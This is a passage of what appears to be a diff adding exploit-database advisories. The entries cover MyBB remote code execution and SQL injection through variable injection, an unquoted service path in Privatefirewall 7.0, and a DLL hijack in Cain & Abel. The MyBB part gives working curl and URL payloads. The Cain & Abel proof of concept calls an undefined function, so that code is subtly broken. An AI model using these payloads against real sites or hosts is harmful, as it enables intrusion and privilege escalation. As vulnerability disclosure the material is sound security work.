But add\_shutdown() function initialization handler is wrong:
```
function add_shutdown($name, $arguments=array())
{
global $shutdown_functions;
if(!is_array($shutdown_functions))
{
$shutdown_functions = array();
}
if(!is_array($arguments))
{
$arguments = array($arguments);
}
if(is_array($name) && method_exists($name[0], $name[1]))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}
else if(!is_array($name) && function_exists($name))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}
return false;
}
```
In the above code we see that run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly and therefore result in arbitrary code execution.
##III. Proof of Concept
When request\_order = "GP" and register\_globals = On, remote code execution by just using curl on the command line:
```
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/
```
##IV. P.S.I
**Another case to exploit the vulnerability:**
When PHP's "disable\_functions" configuration directive disable ini\_get() function:
```
disable_functions = ini_get
```
The unset\_globals() function will not be called that regardless of register\_globals set on or off.
```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
```
**Proof of Concept**
Works on disable\_functions = ini\_get and register\_globals = On:
```
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```
##V. P.S.II
**SQL injection vulnerability via run\_shutdown() function**
```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// We have some shutdown queries needing to be run
if(is_array($shutdown_queries))
{
// Loop through and run them all
foreach($shutdown_queries as $query)
{
$db->query($query);
}
}
```
The $shutdown\_queries was initialized in global.php:
```
$shutdown_queries = array();
```
But not all files are included global.php, such as css.php:
```
require_once "./inc/init.php";
```
There is not included global.php, and $shutdown\_queries is uninitialized, with the result that there is a SQL injection vulnerability.
**Proof of Concept**
Works on request\_order = "GP" and register\_globals = On:
```
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php
```
Works on disable\_functions = ini\_get and register\_globals = On:
```
css.php?shutdown_queries[]=SQL_Inj
```
##VI. Disclosure Timeline
* 2014.03.06 - Notified the MyBB devs via security contact form
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
* 2014.11.21 - Public Disclosure

View file

@ -0,0 +1,68 @@
Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation
Vendor: PWI, Inc.
Product web page: http://www.privacyware.com
Affected version: 7.0.30.3
Summary: Privatefirewall multi-layered endpoint security software protects
32 and 64 bit Windows desktops and servers from malware and unauthorized use.
Personal firewall, packet inspection, URL filtering, anti-logger, process
monitor, and application/system behavior modeling and anomaly detection
components stop hackers, spyware, viruses and other forms of malware before
they can cause damage.
Desc: Privatefirewall suffers from an unquoted search path issue impacting
the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
bundle. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user?s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5209
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php
09.11.2014
---
C:\Users\user>sc qc PFNet
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PFNet
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
LOAD_ORDER_GROUP : TDI
TAG : 0
DISPLAY_NAME : Privacyware network service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
--
C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
--

View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/46239/info
Cain & Abel is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Cain & Abel 2.7.3 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int pwnme()
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
exit(0);
return 0;
}